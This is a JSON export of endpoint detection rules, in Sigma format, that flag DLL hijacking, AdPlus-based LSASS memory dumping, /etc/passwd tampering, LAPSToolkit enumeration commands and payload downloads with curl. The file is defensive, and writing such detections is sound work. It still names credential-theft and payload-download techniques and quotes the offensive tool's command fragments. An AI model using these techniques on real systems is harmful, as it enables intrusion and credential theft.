"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6575df79-0fcb-4da3-b753-94ba6fb5b878",
"rule_name": "DLL Hijacking via upgraderesultsui.exe",
"rule_description": "Detects potential Windows DLL Hijacking via upgraderesultsui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "657e2e2c-ab6b-474c-a1c3-0c845ab605c0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086017Z",
"creation_date": "2026-03-23T11:45:34.086019Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086023Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/techniques/T1127/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1127_adplus_execution_for_proxy_or_dump.yml",
"content": "title: Suspicious AdPlus Execution\nid: 657e2e2c-ab6b-474c-a1c3-0c845ab605c0\ndescription: |\n Detects the suspicious execution of the Adplus.exe development binary.\n Adplus.exe is a legitimate binary used as a developer tool and can be abused by attackers in order to proxy the execution of malicious payloads or dump the memory of processes (such as LSASS').\n It is recommended to analyze the process responsible for the execution of Adplus.exe to determine if it is being used in a legitimate software development context.\nreferences:\n - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1127/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2022/06/10\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1127\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Adplus\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'adplus.exe'\n\n selection_config:\n CommandLine|contains:\n - ' -c '\n - ' /c '\n\n selection_mode:\n CommandLine:\n - '* -hang *'\n - '* /hang *'\n - '* -crash *'\n - '* /crash *'\n CommandLine|contains:\n - ' -sc '\n - ' /sc '\n - ' -p '\n - ' /p '\n - ' -pn '\n - ' /pn '\n - ' -po '\n - ' /po '\n - ' -pmn '\n - ' /pmn '\n condition: selection and 1 of selection_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "657e2e2c-ab6b-474c-a1c3-0c845ab605c0",
"rule_name": "Suspicious AdPlus Execution",
"rule_description": "Detects the suspicious execution of the Adplus.exe development binary.\nAdplus.exe is a legitimate binary used as a developer tool and can be abused by attackers in order to proxy the execution of malicious payloads or dump the memory of processes (such as LSASS').\nIt is recommended to analyze the process responsible for the execution of Adplus.exe to determine if it is being used in a legitimate software development context.\n",
"rule_creation_date": "2022-06-10",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1127",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "65a8b26d-fbd9-480c-8dec-bba6a1cdff90",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586623Z",
"creation_date": "2026-03-23T11:45:34.586627Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586634Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/",
"https://hijacklibs.net/entries/microsoft/external/outllib.html",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_finder.yml",
"content": "title: DLL Hijacking via finder.exe\nid: 65a8b26d-fbd9-480c-8dec-bba6a1cdff90\ndescription: |\n Detects potential Windows DLL Hijacking via finder.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/\n - https://hijacklibs.net/entries/microsoft/external/outllib.html\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/28\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'finder.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\outllib.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Microsoft Office\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\Office*\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Microsoft Office\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\Office*\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "65a8b26d-fbd9-480c-8dec-bba6a1cdff90",
"rule_name": "DLL Hijacking via finder.exe",
"rule_description": "Detects potential Windows DLL Hijacking via finder.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-28",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "65a8fa3a-06de-4ca1-b3dd-64deb561fc8d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622230Z",
"creation_date": "2026-03-23T11:45:34.622232Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622236Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md",
"https://attack.mitre.org/techniques/T1003/008/",
"https://attack.mitre.org/techniques/T1078/"
],
"name": "t1003_008_etc_passwd_modified.yml",
"content": "title: File /etc/passwd Modified\nid: 65a8fa3a-06de-4ca1-b3dd-64deb561fc8d\ndescription: |\n Detects a suspicious attempt to modify /etc/passwd.\n This file contains every registered user that has access to the system, and can be modified to add new accounts.\n It is recommended to ensure that both the process modifying this file and the user that requested the creation of a new user are legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md\n - https://attack.mitre.org/techniques/T1003/008/\n - https://attack.mitre.org/techniques/T1078/\ndate: 2023/01/13\nmodified: 2026/01/21\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.008\n - attack.persistence\n - attack.privilege_escalation\n - attack.initial_access\n - attack.t1078\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.AccountManipulation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/passwd'\n - TargetPath: '/etc/passwd'\n filter_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_common:\n ProcessImage:\n - '*/systemd'\n - '*/sudo'\n - '*/su'\n - '*/sshd'\n - '*/cron'\n - '*/unix_chkpwd'\n - '*/accountsservice/accounts-daemon'\n - '*/passwd'\n - '*/usermod'\n - '*/useradd'\n - '*/chage'\n - '*/userdel'\n - '*/kaniko/executor'\n - '/usr/bin/chfn'\n - '/usr/sbin/groupmod'\n - '/usr/sbin/chpasswd'\n - '/bin/chmod'\n - '/bin/adduser'\n - '/usr/bin/podman'\n - '/usr/bin/ln'\n - '/usr/bin/chsh'\n - '/usr/sbin/pwck'\n - '/usr/bin/systemd-sysusers'\n - '/usr/lib/x86_64-linux-gnu/guix/guile'\n\n exclusion_images:\n ProcessImage:\n - '/usr/bin/skopeo'\n - '/gnu/store/*/bin/guile'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_cmp:\n ProcessCurrentDirectory|startswith: '/var/backups/'\n ProcessImage|endswith: '/cmp'\n ProcessParentName: 'passwd'\n ProcessGrandparentImage|endswith: '/run-parts'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_busybox_general:\n ProcessImage: '/bin/busybox'\n ProcessCommandLine:\n - 'chpasswd'\n - 'adduser *'\n - 'passwd*' # passwd and passwd XXX\n - 'deluser *'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd-shim-runc-v2'\n - '/var/lib/rancher/rke2/data/*/bin/containerd-shim-runc-v2'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - '/nix/store/*-docker-containerd-*/bin/containerd'\n - ProcessAncestors|contains:\n - '|/usr/bin/dockerd|'\n - '/k3s/data/*/bin/containerd-shim-runc-v2|'\n - '/rke2/data/*/bin/containerd-shim-runc-v2|'\n\n exclusion_docker2:\n ProcessImage|endswith: '/bin/dockerd'\n ProcessCommandLine: 'docker-applyLayer *'\n\n exclusion_containerd:\n - ProcessParentImage:\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_ansible_runner:\n # bash /usr/bin/entrypoint ansible-runner worker --private-data-dir=/runner\n ProcessCommandLine:\n - 'bash /usr/bin/entrypoint ansible-runner worker*'\n - 'bash /usr/local/bin/entrypoint ansible-runner worker*'\n\n exclusion_pwconv:\n ProcessImage: '/usr/sbin/pwconv'\n ProcessParentCommandLine|contains: '/sbin/authconfig'\n\n exclusion_pam:\n ProcessParentCommandLine: '/bin/bash /usr/share/libpam-script/pam_script_ses_open'\n\n exclusion_snap:\n - ProcessImage: '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage: '/usr/lib/snapd/snapd'\n\n exclusion_proxmox:\n ProcessCommandLine: 'pvedaemon'\n ProcessGrandparentCommandLine: 'pvedaemon'\n\n exclusion_buildah:\n ProcessImage: '/usr/bin/buildah'\n\n exclusion_nixos:\n ProcessGrandparentImage: '/nix/store/*-switch-to-configuration-*/bin/switch-to-configuration'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "65a8fa3a-06de-4ca1-b3dd-64deb561fc8d",
"rule_name": "File /etc/passwd Modified",
"rule_description": "Detects a suspicious attempt to modify /etc/passwd.\nThis file contains every registered user that has access to the system, and can be modified to add new accounts.\nIt is recommended to ensure that both the process modifying this file and the user that requested the creation of a new user are legitimate.\n",
"rule_creation_date": "2023-01-13",
"rule_modified_date": "2026-01-21",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.initial_access",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1003.008",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "65b180dd-50d1-46e8-ab84-afd8514d89e1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084265Z",
"creation_date": "2026-03-23T11:45:34.084267Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084272Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/leoloobeek/LAPSToolkit/",
"https://adsecurity.org/?p=1790",
"https://kalilinuxtutorials.com/lapstoolkit-audit-attack/",
"https://attack.mitre.org/techniques/T1087/"
],
"name": "t1087_laps_toolkit.yml",
"content": "title: LAPSToolkit PowerShell Script Executed\nid: 65b180dd-50d1-46e8-ab84-afd8514d89e1\ndescription: |\n Detects the usage of LAPSToolkit, a tool written in PowerShell that leverages PowerView to audit Active environments that have deployed Microsoft's Local Administrator Password Solution (LAPS).\n This tool allows attackers to gather significant information and flaws about the Active Directory environment their are discovering.\n It is recommended to analyze the execution context of the IP scanner (mainly its parent process) to determine its legitimacy.\nreferences:\n - https://github.com/leoloobeek/LAPSToolkit/\n - https://adsecurity.org/?p=1790\n - https://kalilinuxtutorials.com/lapstoolkit-audit-attack/\n - https://attack.mitre.org/techniques/T1087/\ndate: 2024/10/23\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.LAPSToolkit\n - classification.Windows.Behavior.Discovery\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n - PowershellScriptPath|endswith: '\\LAPSToolkit.ps1'\n - PowershellCommand|contains|all:\n - 'Find-LAPSDelegatedGroups'\n - 'Get-NetComputer -FullData -Filter \"(ms-mcs-admpwdexpirationtime=*)\" @PSBoundParameters | ForEach-Object'\n - 'Get-NetOU -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData'\n - 'Get-ObjectAcl -Domain $Domain -DomainController $DomainController -Credential $Credential -ResolveGUIDs'\n - 'Write-Verbose \"Retrieving all users and groups to resolve SIDs when using PSCredential\"'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "65b180dd-50d1-46e8-ab84-afd8514d89e1",
"rule_name": "LAPSToolkit PowerShell Script Executed",
"rule_description": "Detects the usage of LAPSToolkit, a tool written in PowerShell that leverages PowerView to audit Active environments that have deployed Microsoft's Local Administrator Password Solution (LAPS).\nThis tool allows attackers to gather significant information and flaws about the Active Directory environment their are discovering.\nIt is recommended to analyze the execution context of the IP scanner (mainly its parent process) to determine its legitimacy.\n",
"rule_creation_date": "2024-10-23",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1087"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "65b72ae8-cc42-4a2b-a7d4-9f6c30bf96b2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081849Z",
"creation_date": "2026-03-23T11:45:34.081851Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081856Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_phantom_dll_hijacking_certreq.yml",
"content": "title: Phantom DLL Hijacking via certreq.exe\nid: 65b72ae8-cc42-4a2b-a7d4-9f6c30bf96b2\ndescription: |\n Detects a potential Windows DLL search order hijacking via certreq.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/06\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CertReq.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded:\n - '?:\\Windows\\System32\\msfte.dll'\n - '?:\\Windows\\System32\\msTracer.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "65b72ae8-cc42-4a2b-a7d4-9f6c30bf96b2",
"rule_name": "Phantom DLL Hijacking via certreq.exe",
"rule_description": "Detects a potential Windows DLL search order hijacking via certreq.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-06",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "65d0c693-d321-45f0-bf8b-7372027471e3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622375Z",
"creation_date": "2026-03-23T11:45:34.622377Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622381Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://twitter.com/pr0xylife/status/1570064310923304962",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1071/001/",
"https://attack.mitre.org/techniques/T1048/"
],
"name": "t1105_file_download_with_curl_for_windows.yml",
"content": "title: File Downloaded via cURL\nid: 65d0c693-d321-45f0-bf8b-7372027471e3\ndescription: |\n Detects the usage of curl.exe to download a file.\n Attackers can use the legitimate curl.exe binary to download malicious payloads from external servers.\n It is recommended to analyze the execution chain associated with this alert to determine its legitimacy, as well as to analyze the downloaded file.\nreferences:\n - https://twitter.com/pr0xylife/status/1570064310923304962\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\n - https://attack.mitre.org/techniques/T1048/\ndate: 2023/12/19\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - attack.exfiltration\n - attack.t1048\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_curl:\n - OriginalFileName: 'curl.exe'\n - Image|endswith: '\\curl.exe'\n\n selection_args:\n CommandLine|contains:\n - ' -o'\n - ' /o'\n - ' --output'\n ParentImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\public\\'\n - '?:\\users\\\\*\\appdata\\'\n - '?:\\\\?Recycle.Bin\\'\n GrandparentImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\public\\'\n - '?:\\users\\\\*\\appdata\\'\n - '?:\\\\?Recycle.Bin\\'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\program files\\'\n - '?:\\program files (x86)\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_command:\n CommandLine|contains:\n - 'https://*.cashsystemes.com/'\n - 'https://*.mixpanel.com/api'\n - '?:\\Program Files\\Neolane\\NeolaneV'\n - '\\SolwareLifePSI\\'\n - 'https://*.enovacom.fr'\n - 'http://*.sage.com.*.ipercast.net/'\n - '--url https://console.fieldwire.net'\n - '-o ?:\\Windows\\TEMP\\SageCoala\\Coala\\'\n - ' --trace-time --connect-timeout '\n - ' 